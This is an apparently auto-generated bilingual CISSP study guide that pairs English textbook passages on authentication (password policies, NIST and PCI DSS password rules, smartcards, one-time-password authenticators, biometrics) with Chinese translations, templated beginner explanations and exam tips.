As an example, Microsoft Windows 11 supports picture passwords, allowing users to authenticate by moving their fingers across the screen using a picture of their choice. Similarly, Android devices support Android Lock, allowing users to swipe the screen connecting dots on a grid. These methods are sometimes referred to as something you do. Something You Know The most common authentication technique is the password, a string of characters entered by a user. Passwords are typically static. A static password stays the same for a length of time, such as 60 days, but static passwords are the weakest form of authentication.

Passwords are weak security mechanisms for several reasons: Users often choose passwords that are easy to remember and, therefore, easy to guess or crack. Randomly generated passwords are hard to remember, causing many users to write them down.

中文直译 / 整理

此处无你 许多IAM系统使用地理定位技术来识别可疑活动。 例如,假设一个用户通 常使用弗吉尼亚海滩的IP地址登录。 如果IAM检测到用户尝试从印度登录 同一账户,即使用户拥有正确的用户名和密码,它也可以阻止访问。 然而, 这并非100%可靠。 一个专门的海外攻击者可以使用在线虚拟专用网络( VPN)服务来更改连接在线服务器时使用的IP地址。 上下文感知身份验证许多移动设备管理(MDM)系统使用上下文感知身份验证 来识别移动设备用户。 它可以识别多个属性,例如用户的地理位置、一天中的 时间以及移动设备。 组织通常允许用户使用移动设备访问网络,当用户尝试登 录时,MDM系统可以检测设备的详细信息。 如果用户满足所有要求(在此示例 中为位置、时间和设备类型),则允许用户使用其他方法登录,例如使用用户 名和密码。 许多移动设备支持在触摸屏上使用手势或手指滑动。 例如,Microsoft Windows 11 支持图片密码,允许用户通过在屏幕上用自己选择的图片进行手 指滑动来完成身份验证。 同样,Android 设备支持 Android 锁屏,允许用户 在网格上的点之间滑动连接。 这些方法有时被称为“你所做的事”。

你知道的东西 最常见的身份验证技术是密码,即用户输入的一串字符。 密码通常是静态的。 静态密码在一段时间内保持不变,例如60天,但静态密码是最薄弱的身份验证 形式。 密码之所以是薄弱的安全机制,原因有多个: 用户通常选择容易记住的密码,因此也容易被猜中或破解。 随机生成的密码难以记住,导致许多用户将其写下来。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 13 / PDF P929

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Users often share their passwords or forget them. Attackers detect passwords through many means, including observation, sniffing networks, and stealing databases. Passwords are sometimes transmitted in cleartext or with easily broken encryption protocols. Attackers can capture these passwords with network sniffers. Password databases are sometimes stored in publicly accessible online locations. Passwords are subject to many types of attack, including brute-force guessing, dictionary attacks, password spraying, credential stuffing, and others. You'll learn about these attacks in Chapter 14. One way of strengthening a password is by using a passphrase.

This is a string of characters similar to a password but has a unique meaning to the user. As an example, a passphrase can be “I earned my CISSP certification.” Many authentication systems do not support spaces, so this passphrase can be modified to “IEarnedMyCISSPCertification.” Using a passphrase has several benefits. It is easy to remember, and it encourages users to create longer passwords. Longer passwords are more difficult to crack using a brute-force tool. Encouraging users to create passphrases also helps ensure that they don't use common, predictable passwords such as “password” and “123456.” Personal identification numbers (PINs) are also in the something you know category.

PINs are typically four, six, or eight numbers long. IT personnel have been trying to force users into creating and maintaining secure passwords using password policies. However, users always seem to find a way around these policies, creating passwords that attackers can easily crack. As a result, security personnel often seek new solutions. The following sections identify several basic password policy components, followed by some of the recommendations by different entities. Password Policy Components Organizations often include a written password policy in the overall security policy.

IT security professionals then enforce the policy with technical controls such as a technical password policy that enforces the password

中文直译 / 整理

用户经常共享他们的密码或忘记它们。 攻击者通过多种手段检测密码,包括观察、网络嗅探和窃取数据库。 密码有时以明文或使用易被破解的加密协议传输。 攻击者可以使用网络 嗅探器捕获这些密码。 密码数据库有时存储在公开可访问的在线位置。 密码面临多种攻击类型,包括暴力猜测、字典攻击、密码喷洒、凭证填 充等。 您将在第14章中了解这些攻击。 增强密码强度的一种方法是使用密码短语。 这是一种与密码相似的字符字符 串,但对用户具有独特的意义。 例如,一个密码短语可以是“I earned my CISSP certification.”。 许多身份验证系统不支持空格,因此该密码短 语可修改为“IEarnedMyCISSPCertification.”。 使用密码短语具有多项优势。 它易于记忆,并鼓励用户创建更长的密码。 更长的密码更难通过暴力工具破解。 鼓励用户创建密码短语也有助于确保 他们不会使用常见的可预测密码,例如“password”和“123456”。 个人识别码(PIN)也属于“你知道”的类别。 PIN 通常由四位、六位或八位数 字组成。 IT 人员一直试图通过密码策略强制用户创建和维护安全密码。

然而,用户总能 找到绕过这些策略的方法,创建出攻击者轻易就能破解的密码。 因此,安全人 员经常寻求新的解决方案。 以下部分列出了几种基本的密码策略组件,随后是 一些不同机构的建议。 密码策略组件 组织通常在整体安全策略中包含一份书面的 密码策略。 IT 安全专业人员则通 过技术控制措施(例如强制执行密码的技術密碼策略)来实施该策略

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
学习单元 14 / PDF P930

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

restriction requirements. The following list includes some common password policy settings: Maximum Age This setting requires users to change their password periodically, such as every 45 days. Some documents refer to this as password expiration. Password Complexity Password complexity refers to how many character types it includes. The different character types are lowercase letters, uppercase letters, numbers, and special characters. A simple password, such as 123456789, contains only one character type (numbers). Complex passwords use three or four character types. Password Length The length is the number of characters in the password, such as at least eight characters long.

When using the same character types in a password, shorter passwords are easier to crack and longer passwords are harder to crack. Minimum Age This setting prevents users from changing their password again until a certain time has passed. Password policies enforcing password history typically have a minimum age of one day. Password History Many users get into the habit of rotating between two passwords. A password history remembers a certain number of previous passwords and prevents users from reusing passwords. Combined with a minimum age of one or more days, it prevents users from changing their password multiple times in one sitting until they return to their original password.

Authoritative Password Recommendations Password recommendations are changing, and so far, there isn't a consensus that everyone is following. Depending on what source you use, you'll find different suggestions for passwords. Several authoritative sources are worth mentioning. All of these sources are updated regularly, but the following versions were active when this book was published: NIST SP 800-63B—Digital Identity Guidelines: Authentication and Life Cycle Management Payment Card Industry Data Security Standard (PCI DSS) version 4.0

中文直译 / 整理

限制要求。 以下列表包含一些常见的密码策略设置: 最大年龄 此设置要求用户定期更改密码,例如每45天一次。 某些文档将此称为 密码过期。 密码复杂度 密码复杂度指的是密码包含的字符类型数量。 不同的字符类型包括小 写字母、大写字母、数字和特殊字符。 一个简单的密码,例如123456789,仅包 含一种字符类型(数字)。 复杂的密码使用三种或四种字符类型。 密码长度 长度是指密码中的字符数量,例如至少八个字符。 当密码使用相同的字 符类型时,较短的密码更容易被破解,而较长的密码更难被破解。 最小年龄 此设置防止用户在经过一定时间之前再次更改密码。 实施密码历史记 录的密码策略通常将最小年龄设置为一天。 密码历史记录 许多用户习惯于在两个密码之间轮换。 密码历史记录会保存一定 数量的先前密码,并防止用户重复使用密码。 结合一天或更长时间的最小年龄, 可防止用户在一次会话中多次更改密码,直到他们回到原始密码。 权威密码建议 密码建议正在发生变化,到目前为止,尚无所有人都遵循的共识。 根据您使用 的来源不同,您会发现不同的密码建议。 有几个权威来源值得提及。

所有这些 来源都定期更新,但以下版本是在本书出版时有效的: NIST SP 800‑63B—数字身份指南:身份验证和生命周期 生命周期管理 支付卡行业数据安全标准(PCI DSS)4.0版

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

信用卡/持卡人数据场景优先想到 PCI DSS。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
身份 身份是主体在系统中的标识。
学习单元 15 / PDF P931

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Chapter 4, “Laws, Regulations, and Compliance,” covers PCI DSS in more depth. NIST Password Recommendations NIST SP 800-63B provided new recommendations on passwords that are quite different from past recommendations. The following list summarizes the changes recommended by NIST: Passwords must be hashed. Passwords should never be stored or transmitted in cleartext. Passwords should not expire. Users should not be required to change their passwords regularly, such as every 30 days. Users often changed a single character when forced to change their password. For example, they would change Password1 to Password2.

Although this complies with the requirement to change the password, it doesn't add to security. Attackers use the same methods when guessing passwords. Users should only be forced to change their password if there is evidence that their current password was compromised. Users should not be required to use special characters. Requiring users to include special characters often challenged users' memory, and they wrote these passwords down. Further, NIST analyzed breached password databases and discovered that special characters in passwords didn't provide the desired benefits. Users should be able to copy and paste passwords. Password managers allow users to create and store complex passwords.

Users enter one password into the password manager to access stored passwords. They can then copy passwords from the password manager and paste passwords into the password text box. When copy and paste is restricted, users must retype the password and typically default to easier passwords. Users should be able to use all characters. Password storage mechanisms have commonly rejected spaces and some special characters. By allowing spaces, users can create longer passwords that are easier to remember. Systems sometimes reject special characters to prevent attacks

中文直译 / 整理

第4章,“法律、法规与合规性」深入介绍PCI DSS 的更多细节。 NIST 密码建议 NIST SP 800‑63B 提出了与以往建议大不相同的密码新建议。 以下列表总结 了 NIST 推荐的变更: 密码必须进行哈希处理。 密码绝不应以明文形式存储或传输。 密码不应设置过期时间。 不应要求用户定期更改密码,例如每30天一次。 当被强 制更改密码时,用户通常只更改一个字符。 例如,他们会将 Password1 改为 Password2。 虽然这符合更改密码的要求,但并未增强安全性。 攻击者在猜测密 码时也使用相同的方法。 只有在有证据表明当前密码已被泄露时,才应强制用户 更改密码。 不应要求用户使用特殊字符。 要求用户包含特殊字符通常会增加用户的记忆负 担,导致他们将密码写下来。 此外,NIST 分析了泄露的密码数据库,发现密码 中的特殊字符并未带来预期的安全效益。 用户应能复制和粘贴密码。 密码管理器允许用户创建和存储复杂密码。 用户只需 在密码管理器中输入一次密码即可访问已存储的密码,然后可从密码管理器复制 密码并粘贴到密码文本框中。 当复制和粘贴功能被限制时,用户必须重新输入密 码,通常会默认使用更简单的密码。

用户应能使用所有字符。 密码存储机制通常会拒绝空格和某些特殊字符。 通过 允许空格,用户可以创建更长且更易记忆的密码。 系统有时会拒绝特殊字符以防 止攻击

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 16 / PDF P932

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

(such as a SQL injection attack), but properly hashing the password masks these characters. Password length should be at least eight characters and as many as 64 characters. A longer length allows users to create passphrases that are meaningful to them. Password systems should screen passwords. Before accepting a password, password systems should check them against a list of commonly used passwords, such as 123456 or password. PCI DSS Password Requirements The PCI DSS (version 4.0) has the following requirements, which differ from NIST SP 800-63B: Passwords expire at least every 90 days. Passwords must be at least 12 characters long.

Passwords must contain both numeric and alphabetic characters. Passwords may not be the same as any of the user's previous four passwords. If organizations need to comply with a specific standard, such as PCI DSS, they should follow at least the minimum requirements from that standard. Something You Have Smartcards and hardware tokens are both examples of the Type 2, or something you have, factor of authentication. They are rarely used by themselves but are commonly combined with another authentication factor, providing multifactor authentication. Smartcards A smartcard is a credit card–sized ID or badge and has an integrated circuit chip embedded in it.

Smartcards contain information about the authorized user that is used for identification and/or authentication purposes. Most current smartcards include a microprocessor and one or more certificates. The certificates are used for asymmetric cryptography such as encrypting data or digitally signing emails, as discussed in Chapter 7, “PKI and Cryptographic (

中文直译 / 整理

例如SQL注入攻击),但正确哈希密码可以屏蔽这些字符。 密码长度应至少为八个字符,最多为 64个字符。 更长的长度允许用户创建对他们有意义的口令短语。 密码系统应筛查密码。 在接受密码之前,密码系统应将其与常用密码列表进 行比对,例如123456或password。 PCI DSS 密码要求 PCI DSS(4.0版)具有以下要求,这些要求与NIST SP 800‑63B不同: 密码至少每90天过期一次。 密码长度必须至少为12个字符。 密码必须包含数字和字母字符。 密码不得与用户前四个密码中的任何一个相同。 如果组织需要遵守特定标准(例如PCI DSS),则应至少遵循该标准的最低要求。 您拥有的物品 智能卡和硬件令牌都是第二类身份验证因素(即“您拥有的物品”)的示例。 它们很少单独使用,但通常与其他身份验证因素结合使用,以实现多因素身份 验证。 智能卡 A 智能卡 是一种与信用卡尺寸相同的身份标识或徽章,内置集成芯片。 智能卡 包含有关授权用户的信息,用于身份识别和/或身份验证。 大多数现代智能卡包 含一个微处理器和一个或多个证书。

这些证书用于非对称加密,例如加密数据 或对电子邮件进行数字签名,如 第 7 章“PKI 和加密

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

信用卡/持卡人数据场景优先想到 PCI DSS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 17 / PDF P933

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Applications.” Smartcards are tamper-resistant and provide users with an easy way to carry and use complex encryption keys. Users insert the card into a smartcard reader when authenticating. It's common to require users to also enter a PIN or password as a second authentication factor with the smartcard. Note that smartcards can provide both identification and authentication. However, because users can share or swap smartcards, they aren't effective identification methods by themselves. Most implementations require users to use another authentication factor, such as a PIN or username and password.

Authenticators A device authenticator, or token, is an authentication secret-generating device or application that users can carry with them. Common authenticators include a display showing a sixto eight-digit number, known as the one-time password (OTP). An authentication server stores the details of the authenticator, so at any moment, the server knows what number is displayed on the user's authenticator. Authenticators are typically combined with another authentication mechanism.

For example, users might enter a username and password (in the something you know factor of authentication) and then enter the number displayed on the authenticator (in the something you have factor of authentication). This provides multifactor authentication. Figure 13.1 shows an example of using a dedicated hardware device from RSA as an authenticator. Figure 13.2 shows an example of using Google Authenticator as a software-based authenticator running on a smartphone.

中文直译 / 整理

应用程序。 ”智能卡具有防篡改特性,为用户提供了一种便捷的方式来携带和 使用复杂的加密密钥。 用户在进行身份验证时,将卡片插入智能卡读卡器。 通常要求用户同时 输入PIN码或密码,作为智能卡的第二重身份验证因素。 请注意,智能卡可同时提供身份识别和身份验证功能。 然而,由于用 户可能共享或交换智能卡,它们本身并不能有效实现身份识别。 大多数实 现要求用户使用其他身份验证因素,例如PIN码或用户名和密码。 身份验证器 一个设备身份验证器(或称令牌)是一种用户可随身携带的身份验证密钥生成 设备或应用程序。 常见的身份验证器包括显示六位至八位数字的显示屏,该数 字称为一次性密码(OTP)。 身份验证服务器存储身份验证器的详细信息,因 此在任何时刻,服务器都知道用户身份验证器上显示的数字。 身份验证器通常与其他身份验证机制结合使用。 例如,用户可能先输入用户名 和密码(属于“你知道的事物”这一身份验证因素),然后输入身份验证器上 显示的数字(属于“你拥有的事物”这一身份验证因素)。 这提供了多因素身 份验证。 图 13.1展示了使用 RSA 的专用硬件设备作为认证器的示例。

图 13.2展示了在 智能手机上运行的 Google Authenticator 作为软件认证器的示例。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 18 / PDF P934

第 934 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 13.1 Hardware authenticator

中文直译 / 整理

图 13.1硬件身份验证器

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 934 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
学习单元 19 / PDF P935

第 935 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

中文直译 / 整理

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

小白解释

场景先行:你是公司的安全负责人,正在读第 935 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 935 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 20 / PDF P936

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

FIGURE 13.2 Software authenticator Each authenticator uses one of two different techniques to generate one-time passwords: Time-Based One-Time Passwords Time-based one-time passwords (TOTPs) are generated by devices and applications that are synchronized with an authentication server. They generate a new OTP periodically, such as every 60 seconds. This requires the authenticator and the server to have accurate and synchronized clocks. For this reason, TOTP approaches are also known as synchronous authenticators. Hash-Based One-Time Passwords HMAC-based one-time passwords (HOTP) do not use a clock.

Instead, the hardware authenticator generates OTPs based on an algorithm and an incrementing counter. When using an incrementing counter, the user clicks a button, causing the authenticator to create a dynamic one-time password that stays the same until it is used for authentication. For this reason, HOTP approaches are also known as asynchronous authenticators. Hardware authenticators provide strong authentication, but they do have failings. If the battery dies or the device breaks or is lost, the user won't be able to gain access to services requiring their use. Something You Are Another common authentication and identification technique is the use of biometrics.

Biometric factors fall into the Type 3, something you are, authentication category. Biometric factors can be used as an identifying technique, an authentication technique, or both. They do not provide authorization or accountability. Using a biometric factor instead of a username or account ID as an identification factor requires a search of the offered biometric pattern against a stored database of enrolled and authorized patterns. Using a biometric factor as an authentication technique requires a one-to-one match of the offered biometric pattern against a stored pattern for the claimed subject identity.

In other words, the user claims an identity, and the authentication system checks the biometric factor to see if the person matches the claimed identity. Physiological biometric methods include fingerprints, face scans, retina scans, iris scans, palm scans (also known as palm topography or palm

中文直译 / 整理

图 13.2软件身份验证器 每个身份验证器使用两种不同技术中的一种来生成一次性密码: 基于时间的一次性密码 基于时间的一次性密码(TOTP)由与认证服务器同步的 设备和应用程序生成。 它们会定期生成一个新的OTP,例如每60秒一次。 这要求 身份验证器和服务器具有准确且同步的时钟。 因此,TOTP方法也被称为同步身 份验证器。 基于哈希的一次性密码 基于HMAC的一次性密码(HOTP)不使用时钟。 相反, 硬件身份验证器根据算法和递增计数器生成OTP。 使用递增计数器时,用户点 击按钮,使身份验证器生成一个动态一次性密码,该密码在被用于认证之前保 持不变。 因此,HOTP方法也被称为异步身份验证器。 硬件身份验证器提供强大的认证,但它们也存在缺陷。 如果电池耗尽、设备 损坏或丢失,用户将无法访问需要使用它们的服务。 您所是的特征 另一种常见的身份验证和识别技术是使用生物特征。 生物特征因素属于第三 类,即“您所是的特征”认证类别。 生物特征因素可用作识别技术、认证技术,或两者兼用。 它们不提供授权或责 任追溯。

使用生物特征因素代替用户名或账户ID作为识别因素时,需要将提供 的生物特征模式与已注册和授权的模式存储数据库进行比对。 将生物特征因素用作认证技术时,需要将提供的生物特征模式与所声称主体身 份的存储模式进行一对一匹配。 换句话说,用户声明一个身份,认证系统则检 查生物特征因素,以确认该人是否与所声称的身份匹配。 生理生物识别方法包括指纹、面部扫描、视网膜扫描、虹膜扫描、手掌扫描 (也称为掌纹或手掌

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

问责性:问责性要求能把行为绑定到具体主体。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

